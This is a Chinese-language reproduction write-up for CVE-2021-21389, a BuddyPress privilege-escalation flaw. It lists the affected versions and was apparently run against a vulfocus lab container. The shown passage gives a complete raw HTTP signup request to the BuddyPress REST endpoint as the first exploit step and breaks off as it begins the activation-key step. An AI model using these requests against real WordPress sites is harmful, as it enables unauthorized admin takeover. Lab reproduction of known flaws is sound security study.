一、漏洞描述
BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。
二、影响版本
5.0.0 <BuddyPress< 7.2.1
三、漏洞复现
PS:本次复现使用的是vulfocus/wordpress_cve-2021-21389:latest
0x01、方法一
- 构造payload
POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: ****:47613
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: python-requests/2.24.0
Accept: */*
Content-Type: application/json; charset=UTF-8
Content-Length: 109
{"user_login": "test1121", "user_email": "[email protected]", "user_name": "test1121", "password": "test1121"}
- 将注册时的activation_key取出来,构造发